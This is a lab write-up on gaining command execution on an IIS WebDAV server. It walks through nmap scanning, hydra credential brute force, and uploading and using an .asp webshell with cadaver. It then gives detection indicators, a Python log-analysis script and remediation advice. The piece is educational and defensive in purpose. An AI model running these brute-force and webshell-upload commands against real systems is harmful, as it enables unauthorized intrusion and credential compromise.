XODA File Upload Exploitation (Lab)

A controlled lab exercise on file upload exploitation, tracking request structures and detection patterns to identify indicators for signature logic.

Tools/Skills:
Web Exploit
Pentesting
Linux
Posted on November 18, 2025

Context

  • Lab exercise. Only run against authorized targets.

  • Minimise impact. Bruteforce and uploads may cause service disruption.

Goal

Gain remote command execution by uploading and using a webshell via an IIS WebDAV-enabled site.

Tools

  • nmap (discovery, http-enum, -sV)

  • hydra (credential brute force, rate-controlled)

  • davtest (WebDAV method and upload testing)

  • cadaver (interactive WebDAV client used to upload/delete files)

  • Browser / curl (manual verification)

  • Kali lab webshells (webshell.asp etc.)


Quick findings (example)

  • Port 80 open.

  • WebDAV available at /webdav/.

  • Authentication required (e.g., Basic or NTLM).

  • PUT allowed for .asp. Uploaded .asp executed by server.


Step-by-step

  1. Initial scan

    nmap -sV -sC 10.17.12.124

    • Look for HTTP (port 80) and WebDAV indicators.
  2. Targeted HTTP enumeration

    nmap -sV --script=http-enum -p80 10.17.12.124

    • Confirms presence of /webdav/ and whether auth is required.
  3. Manual verification

    • Browse to http://10.17.12.124/webdav/.

    • Note authentication prompt and auth type.

  4. Credential access (brute force with care)

    • Use hydra with small lists and throttling to avoid DoS or lockouts.

    • Example conceptual command (tune concurrency/delay):

      hydra -L users.txt -P small-passlist.txt -s 80 -t 4 10.17.12.124 http-get /webdav/

    • Verify valid creds via browser or curl.

    Operational cautions

    • Monitor server responses.

    • Use low concurrency and slow cadence.

    • Prefer credential stuffing with vetted creds over blind large-wordlist attacks.

  5. WebDAV capability testing

    • Run davtest to enumerate allowed methods and upload behavior:

      davtest -url http://10.17.12.124/webdav/ -auth user:password

    • Confirm PUT, MOVE, DELETE permissions and accepted file extensions.

  6. Upload webshell using cadaver (lab only)

    • Start cadaver and connect to the WebDAV path. Cadaver will prompt for authentication if required:

      cadaver http://10.17.12.124/webdav/

      or include creds in the URL (lab only, for convenience):

      cadaver http://username:password@10.17.12.124/webdav/

    • Common cadaver commands:

      ls                  # list directory
      put webshell.asp    # upload single file
      mput *.asp          # upload multiple files
      rm webshell.asp     # delete uploaded file
      mv oldname newname  # rename/move

    • After put, verify upload with ls and by browsing to:
      http://10.17.12.124/webdav/webshell.asp and authenticating.

    Notes

    • cadaver is interactive and less noisy than some scripted uploads.

    • Use it when you need fine control over uploads and to avoid flood-style requests.

  7. Access and test webshell

    • Open uploaded .asp URL in browser with credentials.

    • Test limited commands first (whoami, ipconfig) and record outputs.

  8. Post-exploit actions

    • Collect system info within lab scope: whoami, ipconfig, net user, system files.

    • Avoid lateral movement beyond scope.

  9. Cleanup

    • Remove uploaded webshells via cadaver (rm) or HTTP DELETE.

    • Restore anything modified.

    • Document actions and findings.


Example commands (cheat-sheet)

    # Discovery
    nmap -sV -sC 10.17.12.124
    nmap -sV --script=http-enum -p80 10.17.12.124

    # Safe/controlled brute force (adjust -t and list sizes)
    hydra -L users.txt -P small-passlist.txt -s 80 -t 4 10.17.12.124 http-get /webdav/

    # Davtest (verify upload/exec)
    davtest -url http://10.17.12.124/webdav/ -auth username:password

    # cadaver interactive session
    cadaver http://10.17.12.124/webdav/
    # then inside cadaver:
    #   put webshell.asp
    #   ls
    #   rm webshell.asp


Detection indicators (for defenders)

  • Unexpected PUT / MOVE / DELETE HTTP methods in web logs.

  • New .asp or executable files under webroot.

  • Repeated failed authentication attempts from single IP.

  • Unusual user-agents associated with davtest, cadaver, hydra, or curl.
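
The indicators above, turned into a small log check as an added example (not part of the original write-up): it parses IIS W3C-format lines and correlates a successful PUT of an .asp file with later requests to the same path. The field list, the sample lines, the user-agent substrings and the 401 threshold are assumptions to tune against real logs.

```python
from collections import Counter

# Constructed IIS W3C-format sample; client addresses, user and versions are made up.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip cs(User-Agent) sc-status
2025-11-18 10:00:01 GET /webdav/ - 192.0.2.10 Mozilla/4.0+(Hydra) 401
2025-11-18 10:00:02 GET /webdav/ - 192.0.2.10 Mozilla/4.0+(Hydra) 401
2025-11-18 10:00:03 GET /webdav/ - 192.0.2.10 Mozilla/4.0+(Hydra) 401
2025-11-18 10:05:30 PUT /webdav/webshell.asp labuser 192.0.2.10 cadaver/0.23.3+neon/0.29.6 201
2025-11-18 10:06:00 GET /webdav/webshell.asp labuser 192.0.2.10 Mozilla/5.0+(X11;+Linux+x86_64) 200
2025-11-18 10:07:00 GET /index.html - 192.0.2.77 Mozilla/5.0+(Windows+NT+10.0) 200
2025-11-18 10:09:00 DELETE /webdav/webshell.asp labuser 192.0.2.10 cadaver/0.23.3+neon/0.29.6 204
"""
WRITE_METHODS = {"PUT", "MOVE", "DELETE"}
TOOL_UA = ("davtest", "cadaver", "hydra", "curl")  # assumed substrings, tune to real logs
FAIL_THRESHOLD = 3            # assumed; NTLM handshakes emit benign 401s, raise as needed

def parse(text):
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):      # header names the columns that follow
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def detect(rows):
    alerts, uploaded, fails = [], set(), Counter()
    for r in rows:
        method, path = r["cs-method"].upper(), r["cs-uri-stem"].lower()
        ip, status, ua = r["c-ip"], r["sc-status"], r["cs(User-Agent)"].lower()
        if method in WRITE_METHODS:
            alerts.append(("dav-write", ip, f"{method} {path} {status}"))
        if method == "PUT" and status.startswith("2") and path.endswith(".asp"):
            uploaded.add(path)               # remember it to correlate later requests
            alerts.append(("script-upload", ip, path))
        elif method in ("GET", "POST") and status == "200" and path in uploaded:
            alerts.append(("uploaded-script-run", ip, path))
        if status == "401":
            fails[ip] += 1
            if fails[ip] == FAIL_THRESHOLD:  # alert once per source address
                alerts.append(("auth-failures", ip, f"{FAIL_THRESHOLD} x 401"))
        for tool in TOOL_UA:
            if tool in ua and ("tool-user-agent", ip, tool) not in alerts:
                alerts.append(("tool-user-agent", ip, tool))
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(*alert, sep=" | ")
```

The upload-then-request correlation is the highest-fidelity signal of the four; method and user-agent matches alone will also fire on legitimate WebDAV clients.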

Remediation recommendations

  • Disable WebDAV if not required.

  • Restrict allowed HTTP methods and file extensions.

  • Enforce strong auth and account lockout with safe thresholds.

  • Run web apps under low-privilege accounts.

  • Implement upload filtering and AV/AVT scanning.

  • Monitor and alert on file creations and PUT/MOVE actions.

Safety & ethics

  • Written authorization required.

  • Avoid aggressive brute force or mass uploads.

  • Log time, commands, and outputs for reporting and remediation.
